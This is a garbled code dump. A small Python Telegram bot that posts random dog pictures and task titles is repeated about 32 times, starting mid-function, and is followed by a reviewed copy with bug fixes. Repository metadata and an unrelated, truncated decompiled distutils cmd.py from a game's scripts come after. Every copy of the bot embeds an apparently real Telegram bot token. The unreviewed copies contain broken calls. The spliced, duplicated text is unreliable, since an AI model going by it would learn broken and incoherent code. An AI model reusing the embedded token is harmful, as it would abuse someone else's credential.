bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
# NOTE(review): this region of the file contained ~32 byte-identical copies of
# the same script, each re-defining the same five functions and repeating the
# __main__ guard.  Collapsed to a single copy: the module still defines exactly
# the same public names (get_url, get_tasks, bop, getTaskList, main) and, when
# run directly, still starts one polling loop, so callers and direct execution
# behave the same.


def get_url():
    """Return the URL of a random dog image from the random.dog API."""
    contents = requests.get('https://random.dog/woof.json').json()
    url = contents['url']
    return url


def get_tasks():
    """Fetch the task list from the nowwat API and return the task titles.

    Returns a list of title strings, one per task object in the JSON
    response.
    """
    response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()

    def extract_list(obj):
        # BUG FIX: Python lists have no .map() method, and json.loads()
        # produces dicts (no .title attribute).  Use a comprehension over
        # the 'title' key instead.
        # NOTE(review): assumes each task object carries a 'title' field --
        # confirm against the API response schema.
        return [item['title'] for item in obj]

    tasks = extract_list(response)
    return tasks


# Sending the image requires:
#   - the image URL
#   - the recipient's ID: group/user id
def bop(bot, update):
    """Handle /bop: reply with a random dog picture."""
    # image url:
    url = get_url()
    # recipient's ID:
    chat_id = update.message.chat_id
    bot.send_photo(chat_id=chat_id, photo=url)


def getTaskList(bot, update):
    """Send each task title to the requesting chat as a Markdown message."""
    taskList = get_tasks()
    chat_id = update.message.chat_id
    for task in taskList:
        # BUG FIX: 'Markdown' was an undefined bare name (NameError at
        # runtime); the Bot API expects the parse mode as a string keyword.
        bot.sendMessage(chat_id, task, parse_mode='Markdown')


def main():
    """Wire up command handlers and run the bot until interrupted."""
    # SECURITY(review): the bot token is hard-coded in source; it should be
    # read from an environment variable or config file.  Kept as-is to
    # preserve behavior, but this token should be considered compromised
    # and rotated.
    updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
    dp = updater.dispatcher
    dp.add_handler(CommandHandler('bop', bop))
    # BUG FIX: getTaskList was defined but never registered with the
    # dispatcher, so it was unreachable; expose it as /tasks.
    dp.add_handler(CommandHandler('tasks', getTaskList))
    updater.start_polling()
    updater.idle()


if __name__ == '__main__':
    main()
|
[
"ritesh@emerald.pink"
] |
ritesh@emerald.pink
|
f89dacf4aac0ae3fdb0ad9f2963d35ff0258e14c
|
e68a40e90c782edae9d8f89b827038cdc69933c4
|
/res_bw/scripts/common/lib/distutils/cmd.py
|
d9027a45765ad9ad67fde32fcc7aac035fc0ee26
|
[] |
no_license
|
webiumsk/WOT-0.9.16
|
2486f8b632206b992232b59d1a50c770c137ad7d
|
71813222818d33e73e414e66daa743bd7701492e
|
refs/heads/master
| 2021-01-10T23:12:33.539240
| 2016-10-11T21:00:57
| 2016-10-11T21:00:57
| 70,634,922
| 0
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 14,573
|
py
|
# 2016.10.11 22:19:24 Central Europe (daylight saving time)
# Embedded file name: scripts/common/Lib/distutils/cmd.py
"""distutils.cmd
Provides the Command class, the base class for the command classes
in the distutils.command package.
"""
__revision__ = '$Id$'
import sys, os, re
from distutils.errors import DistutilsOptionError
from distutils import util, dir_util, file_util, archive_util, dep_util
from distutils import log
class Command():
"""Abstract base class for defining command classes, the "worker bees"
of the Distutils. A useful analogy for command classes is to think of
them as subroutines with local variables called "options". The options
are "declared" in 'initialize_options()' and "defined" (given their
final values, aka "finalized") in 'finalize_options()', both of which
must be defined by every command class. The distinction between the
two is necessary because option values might come from the outside
world (command line, config file, ...), and any options dependent on
other options must be computed *after* these outside influences have
been processed -- hence 'finalize_options()'. The "body" of the
subroutine, where it does all its work based on the values of its
options, is the 'run()' method, which must also be implemented by every
command class.
"""
sub_commands = []
    def __init__(self, dist):
        """Create and initialize a new Command object.

        Most importantly, invokes the 'initialize_options()' method, which
        is the real initializer and depends on the actual command being
        instantiated.

        :param dist: the Distribution instance this command belongs to.
        :raises TypeError: if 'dist' is not a Distribution instance.
        :raises RuntimeError: if Command itself (the abstract base) is
            instantiated directly.
        """
        # Imported locally to avoid a circular import between
        # distutils.dist and distutils.cmd.
        from distutils.dist import Distribution
        if not isinstance(dist, Distribution):
            raise TypeError, 'dist must be a Distribution instance'
        if self.__class__ is Command:
            raise RuntimeError, 'Command is an abstract class'
        self.distribution = dist
        self.initialize_options()
        # Left as None so __getattr__ can fall back to the Distribution's
        # 'dry_run' value until it is explicitly set on the command.
        self._dry_run = None
        # Verbosity is inherited from the distribution at creation time.
        self.verbose = dist.verbose
        self.force = None
        self.help = 0
        # Flipped to 1 once finalize_options() has run; see
        # ensure_finalized().
        self.finalized = 0
        return
    def __getattr__(self, attr):
        """Resolve 'dry_run' lazily, deferring to the Distribution.

        'dry_run' reads self._dry_run when that has been set, and the
        owning Distribution's value while it is still None.  Any other
        missing attribute raises AttributeError as usual.
        """
        if attr == 'dry_run':
            myval = getattr(self, '_' + attr)
            if myval is None:
                # Not set on this command: use the distribution's value.
                return getattr(self.distribution, attr)
            else:
                return myval
        else:
            raise AttributeError, attr
        return
def ensure_finalized(self):
if not self.finalized:
self.finalize_options()
self.finalized = 1
    def initialize_options(self):
        """Set default values for all the options that this command
        supports.  Note that these defaults may be overridden by other
        commands, by the setup script, by config files, or by the
        command-line.  Thus, this is not the place to code dependencies
        between options; generally, 'initialize_options()' implementations
        are just a bunch of "self.foo = None" assignments.

        This method must be implemented by all command classes.

        :raises RuntimeError: always, in this abstract base implementation.
        """
        raise RuntimeError, 'abstract method -- subclass %s must override' % self.__class__
    def finalize_options(self):
        """Set final values for all the options that this command supports.

        This is always called as late as possible, ie.  after any option
        assignments from the command-line or from other commands have been
        done.  Thus, this is the place to code option dependencies: if
        'foo' depends on 'bar', then it is safe to set 'foo' from 'bar' as
        long as 'foo' still has the same value it was assigned in
        'initialize_options()'.

        This method must be implemented by all command classes.

        :raises RuntimeError: always, in this abstract base implementation.
        """
        raise RuntimeError, 'abstract method -- subclass %s must override' % self.__class__
    def dump_options(self, header = None, indent = ''):
        """Announce the current values of all user options at INFO level."""
        from distutils.fancy_getopt import longopt_xlate
        if header is None:
            header = "command options for '%s':" % self.get_command_name()
        self.announce(indent + header, level=log.INFO)
        indent = indent + '  '
        for option, _, _ in self.user_options:
            # Long option names use '-', attribute names use '_'; a trailing
            # '=' marks options that take an argument and is stripped here.
            option = option.translate(longopt_xlate)
            if option[-1] == '=':
                option = option[:-1]
            value = getattr(self, option)
            self.announce(indent + '%s = %s' % (option, value), level=log.INFO)
        return
def run(self):
